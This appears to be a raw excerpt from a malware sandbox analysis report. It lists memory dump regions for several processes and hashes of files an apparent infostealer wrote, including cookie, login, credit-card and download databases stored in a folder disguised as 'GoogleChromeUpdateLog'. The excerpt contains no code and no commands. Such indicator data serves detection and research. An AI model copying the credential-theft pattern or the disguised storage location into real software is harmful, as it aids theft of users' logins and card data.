memory/5364-387-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-385-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-383-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-381-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-379-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-373-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-371-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-369-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-367-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-365-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-363-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-361-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-359-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-357-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-355-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-353-0x000002AC35C20000-0x000002AC35C21000-memory.dmp

memory/5364-352-0x000002AC35C10000-0x000002AC35C11000-memory.dmp

memory/4912-1622-0x000001C5F4B70000-0x000001C5F4B78000-memory.dmp

memory/4844-1704-0x00007FFA19EA0000-0x00007FFA1A219000-memory.dmp

memory/1680-1705-0x0000015990030000-0x000001599004E000-memory.dmp

C:\ProgramData\шева.txt

MD5 2c807857a435aa8554d595bd14ed35d1
SHA1 9003a73beceab3d1b1cd65614347c33117041a95
SHA256 3c4fae56f61b7cdf09709c2aaf65ca47d3bf9077b1e5eb0eb1e6c5c34923eb9b
SHA512 95c6fa9f5b342ef34d896f083700ee12d55723e24aff42805bac5c1aa73f07d0db4f9d435d31a61da187edc2336252dfb38529b3f2b1d2039aa2a8e65d64a7a9

memory/3304-2310-0x00000255B9650000-0x00000255B965A000-memory.dmp

memory/3304-2322-0x00000255B96D0000-0x00000255B973A000-memory.dmp

memory/3304-2330-0x00000255B99C0000-0x00000255B99FA000-memory.dmp

memory/3304-2331-0x00000255B9620000-0x00000255B9646000-memory.dmp

memory/3304-2333-0x00000255BA700000-0x00000255BA750000-memory.dmp

memory/3304-2332-0x00000255BA650000-0x00000255BA702000-memory.dmp

memory/3304-2334-0x00000255BA750000-0x00000255BAA7E000-memory.dmp

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\cookies_db

MD5 97c25a3b6bcd92a68d552b33f3a27382
SHA1 6b0506c29cdda605479af58dea9161c7f2344d5e
SHA256 64c2d95b5dc33ed56cff36500b407c50660abc4c0d27e389b22a22c8cf5c6c2d
SHA512 3e8bfac4ee672261a812c0c661a68324068cf0bd945ae9a35339679cece1883ad7ada10c64f35112ebad203a8bca57a40132ac0eb22c71b090bfc9b61c6da623

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\downloads_db

MD5 f310cf1ff562ae14449e0167a3e1fe46
SHA1 85c58afa9049467031c6c2b17f5c12ca73bb2788
SHA256 e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855
SHA512 1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\credit_cards_db

MD5 d9f3a549453b94ec3a081feb24927cd7
SHA1 1af72767f6dfd1eaf78b899c3ad911cfa3cd09c8
SHA256 ff366f2cf27da8b95912968ac830f2db3823f77c342e73ee45ec335dbc2c1a73
SHA512 f48765c257e1539cacce536e4f757e3d06388a6e7e6c7f714c3fce2290ce7cdb5f0e8bb8db740b5899ba8b53e2ed8b47e08b0d043bb8df5a660841dc2c204029

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\login_data_db

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\downloads_db

MD5 9618e15b04a4ddb39ed6c496575f6f95
SHA1 1c28f8750e5555776b3c80b187c5d15a443a7412
SHA256 a4cd72e529e60b5f74c50e4e5b159efaf80625f23534dd15a28203760b8b28ab
SHA512 f802582aa7510f6b950e3343b0560ffa9037c6d22373a6a33513637ab0f8e60ed23294a13ad8890935b02c64830b5232ba9f60d0c0fe90df02b5da30ecd7fa26

C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLog\credit_cards_db

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

memory/3304-2353-0x00000255B9A00000-0x00000255B9A12000-memory.dmp

memory/5736-2763-0x00000201F0950000-0x00000201F096C000-memory.dmp

memory/5736-2764-0x00000201F0970000-0x00000201F0A25000-memory.dmp

memory/5736-2765-0x00000201F0A30000-0x00000201F0A3A000-memory.dmp

memory/5736-2776-0x00000201F0BA0000-0x00000201F0BBC000-memory.dmp

memory/5736-2791-0x00000201F0B80000-0x00000201F0B8A000-memory.dmp

memory/5736-2794-0x00000201F0BE0000-0x00000201F0BFA000-memory.dmp

memory/5736-2795-0x00000201F0B90000-0x00000201F0B98000-memory.dmp

memory/5736-2796-0x00000201F0BC0000-0x00000201F0BC6000-memory.dmp

memory/5736-2797-0x00000201F0BD0000-0x00000201F0BDA000-memory.dmp

memory/4844-3093-0x00007FFA1B180000-0x00007FFA1B2FA000-memory.dmp

memory/4844-3104-0x00007FFA19D80000-0x00007FFA19E98000-memory.dmp

memory/4844-3103-0x00007FFA29850000-0x00007FFA2985D000-memory.dmp

memory/4844-3102-0x00007FFA29860000-0x00007FFA29875000-memory.dmp

memory/4844-3101-0x00007FFA1A680000-0x00007FFA1AAE6000-memory.dmp

memory/4844-3100-0x00007FFA1B0C0000-0x00007FFA1B178000-memory.dmp

memory/4844-3099-0x00007FFA2A0E0000-0x00007FFA2A10E000-memory.dmp

memory/4844-3098-0x00007FFA2A440000-0x00007FFA2A44D000-memory.dmp

memory/4844-3097-0x00007FFA2A110000-0x00007FFA2A129000-memory.dmp

memory/4844-3096-0x00007FFA2A470000-0x00007FFA2A49C000-memory.dmp

memory/4844-3095-0x00007FFA2A450000-0x00007FFA2A46F000-memory.dmp

memory/4844-3094-0x00007FFA2A5D0000-0x00007FFA2A5E8000-memory.dmp

memory/4844-3092-0x00007FFA2A960000-0x00007FFA2A96F000-memory.dmp

memory/4844-3091-0x00007FFA2A5F0000-0x00007FFA2A614000-memory.dmp

memory/4844-3090-0x00007FFA19EA0000-0x00007FFA1A219000-memory.dmp